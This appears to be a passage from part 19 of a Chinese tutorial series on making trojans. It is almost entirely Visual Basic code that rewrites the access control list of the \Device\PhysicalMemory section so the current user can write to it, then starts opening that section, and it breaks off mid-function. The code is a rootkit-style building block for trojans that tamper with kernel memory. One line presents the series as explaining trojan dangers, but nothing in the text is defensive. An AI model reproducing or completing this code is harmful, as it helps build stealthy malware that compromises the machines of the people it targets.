教你如何做木马(19)

主要是讲解木马的危险和系统安全

Private Declare Function ZwOpenSection Lib "NTDLL.DLL" (SectionHandle As Long, ByVal DesiredAccess As Long, ObjectAttributes As Any) As Long

Private Declare Function LocalFree Lib "kernel32" (ByVal hMem As Any) As Long

Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private Declare Function MapViewOfFile Lib "kernel32" (ByVal hFileMappingObject As Long, ByVal dwDesiredAccess As Long, ByVal dwFileOffsetHigh As Long, ByVal dwFileOffsetLow As Long, ByVal dwNumberOfBytesToMap As Long) As Long

Private Declare Function UnmapViewOfFile Lib "kernel32" (lpBaseAddress As Any) As Long

Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)

Private g_hNtDLL As Long

Private g_pMapPhysicalMemory As Long

Private g_hMPM As Long Dim aByte(3) As Byte

Private Type OSVERSIONINFO

dwOSVersionInfoSize As Long

dwMajorVersion As Long

dwMinorVersion As Long

dwBuildNumber As Long

dwPlatformId As Long

szCSDVersion As String * 128 End Type Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (LpVersionInformation As OSVERSIONINFO) As Long Dim verinfo As OSVERSIONINFO

Private Sub SetPhyscialMemorySectionCanBeWrited(ByVal hSection As Long) Dim pDacl As Long

Dim pNewDacl As Long Dim pSD As Long

Dim dwRes As Long Dim ea As EXPLICIT_ACCESS GetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, pDacl, 0, pSD ea.grfAccessPermissions = SECTION_MAP_WRITE

ea.grfAccessMode = GRANT_ACCESS

ea.grfInheritance = NO_INHERITANCE

ea.TRUSTEE.TrusteeForm = TRUSTEE_IS_NAME

ea.TRUSTEE.TrusteeType = TRUSTEE_IS_USER

ea.TRUSTEE.ptstrName = "CURRENT_USER" & vbNullChar

SetEntriesInAcl 1, ea, pDacl, pNewDacl

SetSecurityInfo hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, 0, 0, ByVal pNewDacl, 0 CleanUp:

LocalFree pSD

LocalFree pNewDacl End Sub Private Function OpenPhysicalMemory() As Long

Dim Status As Long Dim PhysmemString As UNICODE_STRING

Dim Attributes As OBJECT_ATTRIBUTES

RtlInitUnicodeString PhysmemString, StrPtr("\Device\PhysicalMemory")

Attributes.Length = Len(Attributes)